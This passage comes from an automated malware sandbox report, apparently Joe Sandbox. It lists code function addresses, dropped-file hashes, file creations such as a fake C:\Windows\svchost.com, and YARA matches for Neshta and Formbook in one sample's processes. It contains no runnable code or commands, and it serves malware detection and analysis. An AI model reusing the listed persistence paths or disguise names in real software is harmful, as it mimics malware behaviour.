          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\svchost.com | File created: C:\Windows\directx.sys
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\Windows\svchost.com
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_004046CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00405FA8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A920A8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009DB090
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A928EC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A9E824
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A81002
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009CF900
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A922AE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A7FA2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FEBB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009FABD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A803DA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8DBD2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A92B28
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EAB40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A6CB4F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009D841F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8D466
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A925DD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A92D07
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009C0D20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A91D55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A92EF7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_009E6E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A8D616
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A91FF1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_2_00A9DFCE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 3_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00401030
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_0041E1D7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00402D87
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00402D90
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00409E2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00409E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00AE20A8
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A2B090
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00AE28EC
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00AEE824
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00AD1002
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Code function: 7_2_00A1F900
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE22AE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ACFA2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4EBB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD03DA
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADDBD2
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2B28
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3AB40
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2841F
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD466
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42581
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2D5E0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE25DD
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A10D20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2D07
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1D55
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2EF7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A36E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD616
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1FF1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E522AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E3FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E323E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E403DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAAB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E528EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E520A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E41002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA99BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D8F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E525DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E42D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D80D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236E1D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A3360
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AAB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA309
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374231B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036D8BE8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037323E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037403DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AEB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372EB8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03745A4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0373FA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB236
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374E2C5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037522AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037532A9
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369C1C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A99BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA830
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03686800
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03741002
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B701D
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037460F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037528EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037520A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037467E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375DFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0370AE60
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A5600
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B06C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03731EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03680D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037525DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B65A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03742D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374CC77
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB477
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2430
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B4CD4
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744496
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8E1D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72FB0
          Source: Joe Sandbox View	Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
          Source: Joe Sandbox View	Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
          Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02D8B150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe	Code function: String function: 0041BDA0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe	Code function: String function: 009CB150 appears 136 times
          Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 036DD08C appears 48 times
          Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 03715720 appears 85 times
          Source: C:\Windows\SysWOW64\help.exe	Code function: String function: 0368B150 appears 177 times
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe	Code function: String function: 00A1B150 appears 54 times
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.584995806.00000000021D0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000003.324725121.0000000003226000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000002.336317174.0000000002190000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.464510666.0000000000ABF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe	Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: vi0EwpbUht.exe, type: SAMPLE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
